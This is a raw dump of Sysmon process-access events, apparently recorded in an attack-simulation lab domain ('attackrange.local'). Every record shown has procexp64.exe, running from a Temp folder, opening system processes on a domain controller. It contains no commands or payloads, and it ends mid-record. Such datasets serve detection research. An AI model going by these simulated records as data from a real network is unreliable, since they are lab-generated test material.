Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786629Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786628Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786627Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786626Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786625Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786624Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786623Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786622Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786621Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786620Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786619Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786618Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786617Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786616Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786615Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786614Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786613Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786612Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786611Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786610Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786609Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786608Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786607Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786606Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 